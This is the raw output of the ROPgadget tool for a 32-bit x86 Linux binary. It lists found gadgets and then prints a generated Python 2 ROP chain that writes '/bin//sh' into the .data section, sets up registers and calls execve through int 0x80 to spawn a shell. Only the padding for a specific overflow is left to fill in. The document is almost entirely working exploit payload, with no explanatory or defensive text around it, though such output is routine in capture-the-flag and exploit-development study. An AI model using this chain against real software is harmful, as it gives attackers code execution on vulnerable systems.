Unique gadgets found: 11713

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

	[+] Gadget found: 0x8050cd5 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret
	[+] Gadget found: 0x8048433 pop esi ; ret
	[+] Gadget found: 0x8048480 pop edi ; ret
	[-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r'

	[+] Gadget found: 0x805467b mov dword ptr [edx], eax ; ret
	[+] Gadget found: 0x806eb0a pop edx ; ret
	[+] Gadget found: 0x8059909 pop eax ; ret
	[+] Gadget found: 0x80492c3 xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

	[+] Gadget found: 0x80492c3 xor eax, eax ; ret
	[+] Gadget found: 0x807a34f inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

	[+] Gadget found: 0x80481c9 pop ebx ; ret
	[+] Gadget found: 0x80de2f9 pop ecx ; ret
	[+] Gadget found: 0x806eb0a pop edx ; ret

- Step 4 -- Syscall gadget

	[+] Gadget found: 0x806c775 int 0x80

- Step 5 -- Build the ROP chain

	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from struct import pack

	# Padding goes here
	p = ''

	p += pack('<I', 0x0806eb0a) # pop edx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x08059909) # pop eax ; ret
	p += '/bin'
	p += pack('<I', 0x0805467b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806eb0a) # pop edx ; ret
	p += pack('<I', 0x080ea064) # @ .data + 4
	p += pack('<I', 0x08059909) # pop eax ; ret
	p += '//sh'
	p += pack('<I', 0x0805467b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x0806eb0a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080492c3) # xor eax, eax ; ret
	p += pack('<I', 0x0805467b) # mov dword ptr [edx], eax ; ret
	p += pack('<I', 0x080481c9) # pop ebx ; ret
	p += pack('<I', 0x080ea060) # @ .data
	p += pack('<I', 0x080de2f9) # pop ecx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x0806eb0a) # pop edx ; ret
	p += pack('<I', 0x080ea068) # @ .data + 8
	p += pack('<I', 0x080492c3) # xor eax, eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0807a34f) # inc eax ; ret
	p += pack('<I', 0x0806c775) # int 0x80
